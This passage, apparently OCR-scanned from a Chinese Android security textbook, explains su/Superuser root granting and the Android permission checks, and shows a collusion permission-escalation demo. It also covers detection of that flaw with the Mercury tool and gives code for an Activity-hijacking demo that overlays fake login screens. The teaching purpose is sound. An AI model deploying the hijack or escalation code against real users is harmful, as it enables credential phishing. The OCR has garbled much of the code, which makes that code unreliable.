https://github.com/ChainsDD。 笔 者 下 载 的 源码 中 ，su 的 版 本 为 3.0.3.2， 
Superuser 的 版 本 为 3.0.7， 接 下 来 的 分 析 中 笔者 以 这 两 个 版 本 为 准 。 

我 们 从 su 的 main0 函 数 逐 行 往 下 看 ，su 程 序 的 核心 功能 由 allow0 与 
deny0 两 个 图 数组 成 ， 在 经 过 计算 获取 到 了 命令 行 参 数 与 命令 后 ， 会 执行 以 
下 代码 。 

if (su from.uid == AID ROOT || su from.uid == AID SHELL) 

allow(shell, orig umask); / /放行 

if (stat(REQUESTOR DATA PATH, &st) < 0) { 

PLOGE("stat"); 
deny (); / /拒绝 


IE (St.st grid. l= SE.st urd)j 


LOGE("Bad uid/gid $d/$d for Superuser Requestor application", 
(int)st.st uid, (int)st.st gid); 
deny () ; / /拒绝 


if (mkdir(REQUESTOR CACHE PATH, 0770) >= 0) ( // 创 建 cache 目 录 
chown(REQUESTOR CACHE PATH, st.st uid, st.st gid); 

} 

setgroups (0, NULL); 

setegid(st.st gid); 


seteuid(st.st uid); 

AID ROOT 5 AID SHELL 2) 3| z& root £ shell FH P^ , ， 对 这 两 种 类 型 用 
户 ，su 直 接 放 行 ，stat() 遂 数 会 检查 手机 是 否 安装 有 Superuser.apk， 没 有 就 会 
拒绝 提升 su 权限 。 条 件 满足 就 继续 判断 gid 与 uid 是 否 相 同 ， 不 相同 则 同样 拒 
绝 提 升 su 权限 ， 接 下 来 调用 mkdir 创 建 cache 目 录 并 调用 chown 更 改 目录 的 所 
有 者 ，cache 目 录 的 完整 路 径 为 /data/data/com.noshufou.android.su/cache， 最 
后 是 调用 setegid 与 seteuid 设 置 组 ID 与 用 户 ID。 接 下 来 就 要 检查 su 的 权限 数据 
库 中 保存 的 设置 了 ， 代 码 如 下 。 


db = database init(); 

if (!db) ( // 打 开 数 据 库 失 败 
LOGE("sudb - Could not open database, prompt user"); 
dballow - DB INTERACTIVE; 


) else ( 
LOGE("sudb - Database opened"); 
dballow = database check(db, &su from, &su to); / /执行 检查 
sqlite3 close(db); / /关闭 数据 库 
db = NULL; 


LOGE("sudb - Database closed"); 
} 


switch (dballow) { / /判断 返回 结果 
case DB DENY: deny(); / /拒绝 
case DB ALLOW: allow(shell, orig umask); / /放行 
case DB INTERACTIVE: break; //A& H. 
default: deny(); // 拒 绝 


) 

database_init0 党 试 打开 permissions.sqlite 数 据 库 文件 ， 如 果 打 开 和 失败 就 
设置 dballow 的 值 为 DB_INTERACTIVE ， 打 开 成 功 就 调用 database_check () 
侈 查 是 否 保存 有 相应 的 权限 请 求 记 录 ， 然 后 返回 结果 给 dballow，dballow 一 
共有 3 种 状态 ，DB_DENY 表示 拒绝 ，DB_ALLOW 表示 放行 ， 
DB_INTERACTIVE 表 示 该 程序 是 第 一 次 请 求 root 权 限 ， 需 要 弹出 交互 窗口 
让 用 户 来 选择 是 否 放行 。 

allow() 与 deny() 的 最 后 一 行 代 码 都 调用 了 exit()， 也 就 是 说 它们 执行 后 su 
程序 就 退出 了 。 如 果 上 面 的 switch 分 支 判 断 中 ，dballow 的 结果 不 是 
DB_INTERACTIVE， 程 序 到 这 里 就 不 会 向 下 执行 了 ， 我 们 接着 看 dballow 为 
DB_INTERACTIVE 的 情况 ， 代 码 如 下 。 


socket_serv_fd = 


if (socket serv fd < 0) ( 


deny(); // 拒 绝 
) 
signal(SIGHUP, cleanup signal); 
signal(SIGPIPE, cleanup signal); 
Signal(SIGTERM, cleanup signal); 
Signal(SIGABRT, cleanup signal); 
atexit(cleanup); 
if (send intent(&su from, &su to, socket path, -1, 0) < 0) ( // 发 送 Intent 
deny(); // 拒 绝 
} 
if (socket receive result(socket serv fd, buf, sizeof(buf)) < 0) ( 
/ /接收 返回 结果 
deny(); / /拒绝 
) 
close(socket serv. fd); // 关 闭 socket 
Socket cleanup(); / /释放 socket 
result = buf; / /返回 的 结果 
if (!strcmp(result, "DENY")) { / /比较 返回 结果 
deny (); / /拒绝 
) else if (!strcmp(result, "ALLOW")) { 
allow(shell, orig umask); / HÁT 
) else ( 
LOGE("unknown response from Superuser Requestor: $s", result); 
deny () ; / / dpt 
j 
deny () ; /7 拒绝 
return -1; // 返 回 -1 


Socket create temp(); 


/ /创建 socket 


这 段 代 码 是 通过 Socket 向 Superuser.apk 发 送 root 权 限 请 求 ， 然 后 根据 返 
回 的 结果 判断 是 拒绝 还 是 放行 。 下 面 是 SuperUserapk 的 工作 了 ， 上 面 的 权限 


请 求 会 被 SuperUserapk 的 SuRequestReceiver 广播 接收 者 收 到 ， 


onReceive() 方 法 代码 如 下 。 


mm 


已 的 


public void onReceive(Context context, Intent intent) ( 
SharedPreferences prefs - PreferenceManager.getDefaultSharedPreferences 
(context); 
String automaticAction - prefs.getString(Preferences.AUTOMATIC ACTION, 
"prompt"); 
if (automaticAction.equals("deny")) (  //iXHiSharedProferences'l'prompt 
的 值 检查 是 否 为 aeny 

sendResult(context, intent, false); // 返 回 拒绝 结果 


return; 

) else if (automaticAction.equals("allow")) (  //XlWmxromptit)ftiéfiJJallow 
sendResult(context, intent, true); // 返 回放 行 结果 
return; 


) 
if (prefs.getBoolean("permissions dirty", false)) (//SharedProferences 
中 permissions_dirty 的 值 
Log.d(TAG, "Database is dirty, check here"); 
String where = Apps.UID + "-? AND " + Apps.EXEC UID + "-? AND " 
+ Apps.EXEC CMD + "=?"; // 构 造 查询 字符 串 的 where 语 句 
Log.d(TAG, where); 
Cursor c - context.getContentResolver().query(Apps.CONTENT URI, 
// 执 行 查询 
new String[] { Apps.ALLOW ), 
Apps.UID + "-? AND " + Apps.EXEC UID + "-? AND " + Apps.EXEC CMD + "-?", 
new String[] ( String.valueOf (intent.getIntExtra (EXTRA CALLERUID, -1)), 
String.valueOf(intent.getIntExtra (EXTRA UID, -1)), 
String.valueOf(intent.getStringExtra (EXTRA CMD)) ), null); 
if (c.moveToFirst()) (  // 移 动 游标 到 查询 记录 的 开始 处 
Log.d(TAG, "Found an entry"); 
switch (c.getlInt(0)) ( 
case Apps.AllowType.ALLOW.: / /放行 


Log.d(TAG, "Allow"); 
sendResult(context, intent, true); 
break; 

case Apps.AllowType.DENY: // 拒 绝 
Log.d(TAG, "Deny"); 


sendResult(context, intent, false); 


break; 
default: 
Log.d(TAG, "Prompt"); 
showPrompt (context, intent); // 弹 出 交互 窗口 
) else ( 
Log.d(TAG, "No entry found, prompt"); 
showPrompt(context, intent); // 弹 出 交互 窗口 
} 
c.close(); /7 关闭 游标 
return; 


) 
int sysTimeout = prefs.getInt(Preferences.TIMEOUT, 0); // 读 取 用 户 操作 响 
应 的 时 间 
if ( sysTimeout > 0) ( 
String key = "active " + intent.getIntExtra(EXTRA CALLERUID, 0); 
long timeout - prefs.getLong(key, 0); 
if (System.currentTimeMillis() < timeout) ( 
sendResult(context, intent, true); // 返 回放 行 结果 
return; 
) else ( 
showPrompt (context, intent); // 弹 出 交互 窗口 
return; 
} 
) else ( 
showPrompt(context, intent); /7 弹出 交互 窗口 
return; 


) 


广播 接收 者 首先 通过 SharedProferences 读 取 prompt 的 值 ， 判 断 用 户 是 否 
在 Superuser.apk 中 设置 root 权 限 请 求 为 自动 处 理 ， 如 果 设 置 了 自动 处 理 ， 那 
么 就 根据 它 的 值 来 自动 返回 拒绝 或 放行 。 反 之 ， 就 到 Superuser.apk 的 权限 数 
据 库 中 搜索 权限 规则 ， 然 后 根据 查询 结果 来 进行 相应 处 理 ， 如 果 查 询 的 结 


果 即 不 是 Apps.AllowType.ALLOW， 也 不 是 Apps.AllowType.DENY， 就 调用 
showPrompt0 弹 出 交互 窗口 ，showPromptO 的 代码 如 下 。 


private void showPrompt(Context context, Intent intent) { 
Intent prompt - new Intent(context, SuRequestActivity.class); 


prompt.putExtras (intent); 
prompt.addFlags(Intent.FLAG ACTIVITY NEW TASK); 


context.startActivity (prompt); 
} 
在 笔者 的 Moto XT615 (已 经 ROOT) 上 首次 运行 Root Explorer， 会 弹出 


权限 请 求 窗口 ， 如 图 11-2 所 示 ， 该 窗口 就 是 showPrompt() 执 行 后 的 效果 。 


PE 
超级 用 户 请 


Root Explorer 正在 请 求 超级 用 户 权 限 


j ora 


图 11-2 root 权限 请 求 


SuRequestActivity 会 响应 允许 按钮 与 拒绝 按钮 的 点 击 事件 ， 两 个 按钮 都 
是 通过 sendResult0 来 完成 事件 处 理 的 。sendResultO 会 做 两 件 事 : 第 一 件 事 
是 通过 SharedProferences 来 保存 用 户 Hp 包括 是 否 记 住 选择 、 
或 拒绝 、 当 前 时 间 等 ， 第 二 件 事 是 通过 socket 向 su 发 送 用 户 操 作 结 


showPrompt0O 执 行 返回 后 ， 会 检查 用 户 操作 是 否 超时 ， 如 果 超 时 就 重新 弹出 
权限 请 求 提示 。 

Superuser.apk 除 了 对 普通 程序 的 root 权 限 请 求 进行 控制 外 ， 还 提供 了 
NFC, SecretCode、PinCode 的 权限 请 求 监控 ， 不 过 要 想 开 启 这 些 功 能 还 得 
更 改 Superuser.apk 的 源 代码 ， 详 细 的 代码 笔者 在 此 就 不 展开 了 ， 有 兴趣 的 读 
者 可 以 自己 阅读 Superuser.apk 的 源 代码 。 


11.3 Android RAA 


Android 权 限 机 制 是 Android 系 统 提 供 的 基础 安全 措施 。 本 节 将 介绍 
Android 权 限 的 工作 机 制 ， 以 及 如 何 对 其 进行 攻击 。 


11.3.1 Android 权限 检查 机 制 


Android 系 统 通过 权限 来 控制 软件 想 要 使 用 的 功能 ， 程 序 默认 情况 下 没 
有 权限 去 进行 特定 的 操作 ， 例 如 打 电 话 、 发 短信 ， 软 件 要 想 进行 这 些 操作 
必须 显 式 地 申请 相应 的 权限 。 如 果 没 有 申请 权限 而 执行 特定 的 操作 ， 软 件 
在 运行 时 通常 会 抛 出 一 个 SecurityException 异 常 。 申 请 权限 的 方法 很 简单 ， 
只 需要 在 程序 的 AndroidManifest.xml 文 件 中 添加 相应 的 权限 代码 即 可 。 例 如 
在 程序 中 使 用 发 送 短 信 功 能 ， 需 要 在 AndroidManifest.xml 中 添加 下 面 这 行 代 
但 。 

«uses-permission android:name-"android.permission.SEND, SMS"/» 

所 有 了 可 以 使 用 的 权限 位 于 系统 源码 的 
frameworks\base\data\etc\platform.xml 文 件 中 。 其 中 的 权限 可 以 分 为 两 大 类 : 
直接 读 写 设备 的 底层 (low-level) 权限 与 间接 读 写 设备 的 高 层 (high-level) 
权限 。 

android.permission.INTERNET 权 限 属 于 底层 权限 ， 它 的 声明 如 下 。 


«permission name-"android.permission.INTERNET" 
«group gid-"inet" /» 


«/permission» 


> 


name 指定 了 权限 的 名 称 ，gid 指 定 了 所 关联 的 用 户 组 。 
android.permission.INTERNET 权 限 关 联 了 inet 用 户 组 ， 当 软件 中 声明 了 该 权 
限 后 ， 运 行 时 的 进程 所 属 的 用 户 就 会 添加 到 inet 用 户 组 ， 我 们 可 以 编写 下 面 
的 代码 进行 测试 。 
private String getMyID() { 
String str - null; 
try ( 


java.lang.Process process-Runtime.getRuntime().exec("id"); 


InputStream input - process.getInputStream(); 


BufferedReader in - new BufferedReader( 


new InputStreamReader (process.getInputStream(),"GBK")); 
str - in.readLine(); 


input.close(); 
) catch (IOException e) { 


e.printStackTrace(); 


) 
return str; 
} 


Runtime.getRuntime() 执 行 的 系统 id 命 令 用 于 输出 当前 用 户 的 uid、gid 以 


及 用 户 组 信息 。 运 行 本 小 节 的 Permission 实 例 ， 效 果 如 图 11-3 所 示 ， 可 以 发 
现 当 前 程序 的 用 户 已 经 属于 inet 组 了 。 
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low-level Permission 


本 程序 用 户 信息 : uid-10035(app. 35) 
gid=10035(app_35) groups=3003(inet) 


图 11-3 ”Prmission 实 例 运行 结果 


高 层 权 限 与 底层 权限 不 同 ， 高 层 权 限 是 通过 Framework 层 的 权限 检查 代 
码 来 进行 权限 控制 的 。 例 如 下 面 的 代码 。 


private boolean CheckNetworkState() { 
boolean flag = false; 
ConnectivityManager manager = (ConnectivityManager)getSystemService( 
Context.CONNECTIVITY SERVICE); 
if(manager.getActiveNetworkInfo() !- null) { 
flag - manager.getActiveNetworkInfo().isAvailable(); 
) 
return flag; 


CheckNetworkState() 方 法 用 于 检查 当前 网 络 状态 是 否 可 用 ， 其 中 调用 的 


ConnectivityManager 类 的 getActiveNetworkInfo() 方 法 就 需要 使 用 到 
android.permission.ACCESS_NETWORK_STATE 权 限 ， 该 权限 就 属于 高 层 权 
限 。 我 们 来 看 一 下 getActiveNetworkInfo() 方 法 的 实现 。 


用 


public NetworkInfo getActiveNetworkInfo() { 
enforceAccessPermission(); 
final int uid - Binder.getCallingUid(); 
return getNetworkInfo(mActiveDefaultNetwork, uid); 
) 
enforceAccessPermission() 用 于 执行 权限 检查 ， 它 的 代码 如 下 。 
private void enforceAccessPermission() ( 
mContext.enforceCallingOrSelfPermission( 
android.Manifest.permission.ACCESS NETWORK, STATE, 
"ConnectivityService"); 


) 
原来 是 调用 enforceCallingOrSelfPermission() 方 法 来 检查 的 ， 该 方法 的 作 
是 检查 是 否 声 明了 访问 网 络 状 态 的 权限 


android.permission.ACCESS_NETWORK_STATE , 如果 没有 就 抛 出 
SecurityException 安 全 异常 中 止 程 序 。 其 实 还 有 很 多 其 它 的 权限 检查 方法 ， 
它们 都 是 由 继承 自 Context 的 ContextImpl 类 来 实现 的 。 根 据 检查 的 内 容 与 处 
理 的 方法 不 同 ， 可 以 将 权限 检查 方法 分 为 以 下 几 类 : 


e 检查 权限 并 返回 结果 型 

public int checkPermission(String permission, int pid, int uid) 
public int checkCallingPermission(String permission) 

public int checkCallingOrSelfPermission(String permission) 

e 检查 权限 失败 抛 出 异常 型 

public void enforcePermission( String permission, int pid, int uid, String message) 


public void enforceCallingPermission(String permission, String message) 


public void enforceCallingOrSelfPermission( String permission, String message) 


e Uri 权限 控制 型 


public void grantUriPermission(String toPackage, Uri uri, int modeFlags) 


public void revokeUriPermission(Uri uri, int modeFlags) 


o Uri 权 限 检查 并 返回 结果 型 


public int checkUriPermission(Uri uri, int pid, int uid, int modeFlags) 
public int checkCallingUriPermission(Uri uri, int modeFlags) 

public int checkCallingOrSelfUriPermission(Uri uri, int modeFlags) 
public int checkUriPermission(Uri uri, String readPermission, 


String writePermission, int pid, int uid, int modeFlags) 


e Uri 权 限 检查 失败 抛 出 异常 型 

public void enforceUriPermission(Uri uri, int pid, int uid, int modeFlags, 
String message) 

public void enforceCallingUriPermission(Uri uri, int modeFlags, String 
message) 

public void enforceCallingOrSelfUriPermission(Uri uri, int modeFlags, String 
message) 

public void enforceUriPermission( Uri uri, String readPermission, String 
writePermission, 


int pid, int uid, int modeFlags, String message) 

每 个 权限 检查 的 控制 粒度 与 处 理 方法 都 不 同 ， 根 据 处 理 的 对 象 不 同 ， 
它们 又 可 以 分 为 一 般 的 权限 检查 与 Uri 的 权限 检查 两 大 类 。 权 限 检查 的 对 象 
可 以 是 Permission 字 符 串 匹配 、pid、tid、Uri。 我 们 接着 上 面 查 看 
enforceCallingOrSelfPermission() 方 法 的 代码 。 

public void enforceCallingOrSelfPermission( 

String permission, String message) { 
enforce(permission, 
checkCallingOrSelfPermission(permission), 
true, 
Binder.getCallingUid(), 
message); 


} 

enforce() 方 法 判断 checkCallingOrSelfPermission 0 的 权限 检查 结果 ， 如 
果 结 果 不 为 PackageManager.PERMISSION_GRANTED ， 则 抛 出 
SecurityException 异 常 。 代 码 如 下 。 


private void enforce( 
String permission, int resultOfCheck, 


boolean selfToo, int uid, String message) ( 


if (resultOfCheck !- PackageManager.PERMISSION GRANTED) { 
throw new SecurityException( 
(message !- null ? (message + ": ") : "") + 
(selfToo 
? "Neither user " + uid + " nor current process has " 
: "User " + uid + " does not have ") + 


permission 十 
Nol s 
) 
} 


其 它 权 限 检查 方法 的 代码 笔者 就 不 讨论 了 ， 有 兴趣 的 读者 可 以 自己 阅 
读 Android 系 统 源码 中 的 ContextImpl.java 文 件 。 


11.3.2” 串 谋 权限 攻击 


Android 程 序 中 资源 的 访问 包括 使 用 Framework 提 供 的 功能 与 访问 其 它 
程序 的 组 件 ， 前 者 是 通过 系统 提供 的 权限 机 制 进 行 控制 的 ， 后 者 是 通过 自 
定义 权限 控制 的 。 正 常情 况 下 ， 没 有 声明 特定 的 访问 权限 ， 就 无 法 访问 这 
些 资 源 。 但 通过 其 它 程序 中 可 访问 的 Android 组 件 ， 就 有 可 能 突破 这 种 访问 
控制 ， 从 而 提升 程序 本 身 的 权限 ， 这 种 权限 提升 的 攻击 方式 笔者 在 此 将 它 
称 为 串 谋 权限 攻击 。 

串 谋 权限 攻击 的 原理 如 图 11-4 所 示 。 程 序 1 本 身 无 任何 权限 ， 它 的 组 件 2 
想 要 “联网 下 载 文件 并 保存 到 SD 卡 上 ”， 这 在 正常 情况 下 是 不 允许 的 ， 程 序 2 
拥有 联网 与 写 SD 卡 的 权限 ， 并 实现 了 文件 下 载 与 保存 的 功能 ， 此 时 程序 1 的 
组 件 2 可 以 通过 访问 程序 2 的 组 件 1 来 实现 文件 的 下 载 ， 从 而 突破 Android 系 统 
的 权限 控制 机 制 。 


程序 1 程序 2 


组 件 1 组 件 。 | > aa | 组 件 2 
不 允许 允许 


联网 下 载 文件 并 保存 到 SD 卡 上 


图 11-4 ” 串 谋 权限 攻击 


本 节 的 实例 DownloadManager 模 拟 了 一 个 下 载 管理 程序 ， 输 入 想 要 下 载 
的 文件 URL， 点 击 下 载 按钮 即 开始 下 载 ， 下 载 下 来 的 文件 默认 保存 到 SD 卡 
上 。 程 序 的 运行 效果 如 图 11-5 所 示 。 
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文件 下 载 管理 演示 程序 


请 输入 要 下 载 的 文件 URL 


JKL 


TUV 


11-5 DownloadManager 实 例 


DownloadManager 拥 有 下 载 文件 与 保存 到 SD 卡 上 的 权限 ， 是 正规 的 “有 
权 ” 一 族 。 它 的 AndroidManifest.xml 文 件 中 有 如 下 两 行 权限 的 声明 。 


«uses-permission android:name="android.permission.WRITE EXTERNAL_STORAGE"/> 


«uses-permission android:name="android.permission.INTERNET"/> 


下 载 文件 的 功能 是 通过 接收 下 载 请 求 广播 ， 然 后 在 下 载 广播 接收 者 中 
完成 的 ， 相 应 的 广播 接收 者 在 AndroidManifest.xml 中 声明 如 下 。 


«receiver android:name-".DownloadReceiver"» 
«intent-filter» 
«action android:name-"com.droider.download"»«/action- 
«/intent-filter- 


«/receiver-» 
DownloadReceiver!ll[j MZ Action 7J *com.droider.download" By] 3$, 2A/mi 
问 Intent 指 定 的 URL 地 址 去 下 载 文件 ， 相 应 的 广播 响应 代码 如 下 。 


public void onReceive(Context context, Intent intent) ( 
if (intent.getAction().equals("com.droider.download")) ( 
String url = intent.getExtras().getString("url"); 
String fileName - intent.getExtras().getString("filename"); 
Toast.makeText(context, url, Toast.LENGTH SHORT).show(); 
try ( 
downloadFile(url, fileName); // 下 载 文件 
) catch (IOException e) ( 


e.printStackTrace(); 


) 

需要 下 载 的 文件 是 通过 un 字符 串 传 递 过 来 的 ， 保 存 的 文件 名 则 是 
filename 传 递 过 来 的 。 下 面 来 看 看 我 们 的 攻击 程序 EvilDownloader， 它 什么 
权限 都 没有 ， 只 有 一 段 发 送 文 件 下 载 请 求 的 代码 。 


btnl.setOnClickListener(new OnClickListener() ( 


QOverride 
public void onClick(View v) ( 
Intent intent - new Intent(); // 创 建 Intent 对 象 
intent.setAction("com.droider.download"); 
intent.putExtra("url", 
"http: //developer.android.com/images/home/android-jellybean.png"); 
// 要 下 载 的 文件 URL 
String fileName = "jb.png"; / /保存 的 文件 名 
intent.putExtra("filename", fileName); 


sendBroadcast(intent);  // 发 送 广播 
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当 EvilDownloader 实 例 的 下 载 文件 按钮 被 点 击 ， 以 上 代码 就 会 执行 ， 
DownloadReceiver 收 到 广播 后 就 开始 下 载 文件 ， 如 图 11-6 所 示 ， 一 次 完美 的 
串 谋 攻 击 就 完成 了 。 


串 谋 攻 击 演示 程序 


http://developer.android.com/images/ 
home/android-jellybean.png 


图 11-6 SHARE 


11.3.3 ”权限 攻击 检测 


串 谋 攻击 主要 针对 Android 系 统 的 可 访问 组 件 ， 因 此 防范 的 方法 是 开发 
人 员 在 编写 代码 时 为 组 件 添 加 访问 控制 权限 。 但 很 多 时 候 ， 我 们 不 具备 源 
代码 的 访问 权限 ， 励 其 是 软件 测试 人 员 ， 他 们 的 职责 是 找 出 软件 中 潜在 的 


bug 与 安全 隐患 ， 在 测试 大 量 apk 时 ， 很 难 通过 直接 运行 或 反 编译 apk 找 出 安 
全 问题 所 在 。 这 种 情况 就 需要 借助 工具 来 完成 安全 检测 了 。 

笔者 在 此 推荐 一 款 开 源 的 Android 平 台 安 全 评估 工具 Mercury， 它 除了 能 
邻 查 组 件 权 限 提升 漏洞 外 ， 还 能 检测 Android 系 统 安 全 漏洞 。 该 工具 的 项 目 
主页 为 https://github.com/mwrlabs/mercury， 目 前 最 新 版 本 为 1.1， 官 方 编译 
好 的 文件 的 下 载 地 址 为 http://labs.mwrinfosecurity.com/assets/299/mercury- 
V1.1.zipo 

下 面 我 们 来 看 看 该 工具 是 如 何 检 测 组 件 权 限 提升 漏洞 的 。 将 下 载 好 的 
mercury-v1.1.zip 解 压 ， 然 后 在 AVD 上 安装 mercury-server.apk， 如 果 是 在 手机 
上 安装 ， 确 保 手机 能 够 获取 root 权 限 。 安 装 好 后 启动 Mercury 程 序 ， 点 击 界 
面 上 的 OFF 按 钮 启动 Mercury 服 务 ， 此 时 按钮 会 切换 为 ON 状态 ， 效 果 如 
11-7 所 示 。 


上 5554: Android2. 3.3 


æ MM é 9:19 
Mercury 


b 


JUN 


pet m um m mt rg m m oa en 


Ema valaa 


Mercury server started 


图 11-7 开始 Mercury 服 务 


PC 端的 Mercury 客 户 端 是 通过 Socket 与 AVD 上 的 服务 端 通讯 的 ， 在 启动 
客户 端 前 ， 需 要 在 PC 问 的 命令 提示 符 下 执行 如 下 命令 开启 疹 口 转发 。 

adb forward tcp:31415 tcp:31415 

31415 是 Mercury 使 用 的 默认 端口 。 命 令 执 行 完 后 就 可 以 启动 Mercury 客 
户 端 了 ， 在 命令 提示 符 下 执行 mercury.py 会 进入 Mercury 的 Shell 环 境 ， 如 
11-8 所 示 。 


c* C: AWINDOWSAsystem32Xcmd.exe 一 mercury.py 


;;Nnercurgy-ud.i1*5client?nercury.py 
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The heavy metal that poisoned the droid 


ercury» 
图 11-8 Mercury Shell A15 


在 Shell 环 境 下 执行 “connect 127.0.0.1” 来 连接 服务 端 ， 连 接 成 功 后 输入 
DEDE 查看 可 以 使 用 的 命令 。 以 上 一 小 节 的 串 谋 攻击 为 例 ， 我 们 需要 查看 的 是 
没有 设置 权限 的 广播 接收 者 ， 因 此 执行 broadcast 命 令 ， 执 行 完 后 输入 help 查 
看 可 以 使 用 的 命令 (Mercury 所 有 help 查 看 其 使 用 帮 
助 ) ， 查 看 所 有 的 广播 接收 者 可 以 执行 info 命 令 ， 下 面 是 笔者 执行 info 的 输 
出 信息 。 


*mercury#broadcast> info 
Package name: com.android.launcher 
Receiver: com.android.launcher2.InstallShortcutReceiver 


Required Permission: com.android.launcher.permission.INSTALL SHORTCUT 


Package name: com.android.launcher 
Receiver: com.android.launcher2.UninstallShortcutReceiver 


Required Permission: com.android.launcher.permission.UNINSTALL SHORTCUT 


Package name: com.android.quicksearchbox 

Receiver: com.android.quicksearchbox.CorporaUpdateReceiver 
Required Permission: null 

Package name: com.android.deskclock 

Receiver: com.android.alarmclock.AnalogAppWidgetProvider 


Required Permission: null 


Package name: com.droider.downloadmanager 
Receiver: com.droider.downloadmanager.DownloadReceiver 


Required Permission: null 


从 输出 信息 中 可 以 一 眼看 出 ，downloadmanager 程序 的 


DownloadReceiver 广 播 接收 者 不 需要 权限 就 可 以 调用 。 下 面 我 们 使 用 send 命 
令 发 送 一 条 Action 为 “com.droider.download” 的 广播 ， 来 模拟 一 次 串 谋 权限 攻 
击 。 执 行 以 下 命令 (注意 是 1 行 ) : 


send --action com.droider.download -extrastring 
"url"-"http://developer.android.com/images/home/android-jellybean.png" 


"filename"-"jb.png" 


命令 执行 后 AVD 上 的 downloadmanager 有 了 上 反应， 效果 如 图 11-9 所 示 ， 


说 明 此 时 发 现 了 一 处 安全 漏洞 。 
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图 11-9 DownloadReceiver 广 播 接收 者 被 执行 


Mercury 的 其 它 功能 笔者 在 此 就 不 介绍 了 ， 读 者 可 以 自己 慢 慢 去 摸索 。 
至 于 如 何 防 范 权限 攻击 ， 我 们 将 在 下 一 小 节 Android 组 件 安全 中 介绍 。 


11.4 Android 组 件 安全 


Android 组 件 包 括 Activity、 Broadcast Receiver, Service. Content 
Provider。 它 们 是 Android 软 件 开发 人 员 每 天 接触 到 的 东西 。 本 小 节 主 要 介绍 
使 用 Android 组 件 时 ， 可 能 会 产生 的 安全 问题 ， 以 及 如 何 对 它们 进行 防范 。 


11.4.1 Activity 安 全 及 Activity 支 持 演示 


Activity 组 件 是 用 户 唯 一 能 够 看 见 的 组 件 ， 作 为 软件 所 有 功能 的 显示 载 
体 ， 其 安全 问题 是 最 应 该 受到 关注 的 。Activity 安 全 首先 要 讨论 的 是 访问 权 
限 控制 ， 正 如 Android 开 发 文档 中 所 说 的 ，Android 系 统 组 件 在 指定 Intent 过 
滤器 (intent-filter) 后 ， 默 认 是 可 以 被 外 部 程序 访问 的 。 可 以 被 外 部 访问 就 
意味 着 可 能 被 其 它 程序 用 来 进行 串 谋 攻击 ， 那 如 何 防止 Activity 被 外 部 调用 
呢 ? 

Android 所 有 组 件 声明 时 可 以 通过 指定 android:exported 属 性 值 为 false， 
来 设置 组 件 不 能 被 外 部 程序 调用 。 这 里 的 外 部 程序 是 指 签名 不 同 、 用 户 ID 
不 同 的 程序 ， 签 名 相同 且 用 户 ID 相 同 的 程序 在 执行 时 共享 同一 个 进程 空 
间 ， 彼 此 之 间 是 没有 组 件 访问 限制 的 。 如 果 和 希望 Activity 能 够 被 特定 的 程序 
访问 ， 就 不 能 使 用 android:exported 属 性 了 ， 可 以 使 用 android:permission 属 性 
来 指定 一 个 权限 字符 串 ， 例 如 下 面 的 Activity 声 明 。 


«Activity android:name-".MyActivity" 
android:permission-"com.droider.permission.MyActivity"-» 
«intent-filter-» 

«action android:name-"com.droider.action.work"»«/action» 
«/intent-filter-» 


«/Activity» 

这 样 声明 的 Activity 在 被 调用 时 ，Android 系 统 就 会 检查 调用 者 是 否 具有 
com.droider.permission.MyActivity 权限 ， 如 果 不 具 备 就 会 引发 一 个 
SecurityException 安 全 异常 。 要 想 启 动 该 Activity 必 须 在 AndroidManifest.xml 
文件 中 加 入 下 面 这 行 声 明 权 限 的 代码 。 

<uses-permission android:name=" com.droider.permission.MyActivity" /> 

除了 权限 攻击 外 ，Activity 还 有 一 个 安全 问题 ， 那 就 是 Activity 动 持 。 
Activity 动 持 方法 最 早 是 在 2011 年 的 一 次 安全 大 会 上 由 SpiderLabs 安 全 小 组 公 
布 的 ， 从 受 影响 的 角度 来 看 ，Activity 动 持 技术 属于 用 户 层 的 安全 ， 程 序 员 
是 无 法 控制 的 。 它 的 原理 如 下 : 当 用 户 安 装 了 带 有 Activity 动 持 功能 的 恶意 
程序 后 ， 恶 意 程序 会 遍历 系统 中 运行 的 程序 ， 当 检测 到 需要 劫持 的 Activity 

(通常 是 网 银 或 其 它 网 络 程序 的 登录 页 面 ) 在 前 台 运 行 时 ， 恶 意 程序 会 启 
动 一 个 带 FLAG_ACTIVITY_ NEW. TASKS BJ$J É Activity E 25 IE ?8 By 


Activity， 从 而 欺骗 用 户 输入 用 户 名 或 密码 信息 ， 当 用 户 输入 完 信息 后 ， 亚 
意 程序 会 将 信息 发 送 到 指定 的 网 址 或 邮箱 ， 然 后 切换 到 正常 的 Activity 中 
去 5 

Activity 动 持 对 于 用 户 操作 来 说 几乎 是 透明 的 ， 人 危害 性 也 可 想 而 知 ， 本 
小 节 的 实例 HijackActivity 就 是 一 个 Activity 动 持 演示 程序 ， 运 行 后 界面 如 图 
11-10 所 示 。 


Activity 动 持 演 示 程序 


支持 的 进程 列表 : 
com.android.music 
com.android.browser 


图 11-10 。 Activity 劫持 演示 程序 


HijackActivity 实 例 可 以 对 多 个 进程 进行 动 持 ， 它 在 启动 时 启动 了 一 个 
Hijacker 服 务 ，Hijacker 服 务 创建 了 一 个 定时 器 ， 定 时 器 每 隔 2 秒 就 检测 一 次 


系统 正在 运行 的 进程 ， 判 断 前 人 台 运 行 的 进程 在 劫持 的 进程 列表 中 是 否 有 匹 
配 项 ， 如 果 有 就 对 其 进行 动 持 。 它 的 代码 如 下 。 


private TimerTask mTask = new TimerTask() { 


GOverride 
public void run() ( 
// TODO Auto-generated method stub 


ActivityManager am = (ActivityManager) getSystemService (Context. 
ACTIVITY SERVICE); 
List«RunningAppProcessInfo» infos - am.getRunningAppProcesses(); 
// 枚 举 进 程 
for (RunningAppProcessInfo psinfo : infos) ( 

if (psinfo.importance -- RunningAppProcessInfo.IMPORTANCE. 


FOREGROUND) ( // 前 台 进 程 
if (mhijackingList.contains(psinfo.processName)) { 
Intent intent - new Intent(getBaseContext(), 
HijackActivity.class); 
intent.addFlags(Intent.FLAG ACTIVITY NEW TASK); 
intent.putExtra("processname", psinfo.processName); 
getApplication().startActivity(intent); // 启 动 伪 造 的 Activity 


b 
现在 在 AVD 中 启动 Music 或 Browser 应 用 都 将 被 HijackActivity 劫 持 ， 效 果 


如 图 11-11 所 示 。 
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图 11-11 ”HijackActivity 成 功 支持 Music 应 用 


Activity 劫 持 不 需要 在 AndroidManifest.xzml 中 声明 任何 权限 就 可 以 实 
现 ， 一 般 的 防 病毒 软件 无 法 检测 ， 手 机 用 户 更 是 防不胜防 ， 目 前 也 没有 什 
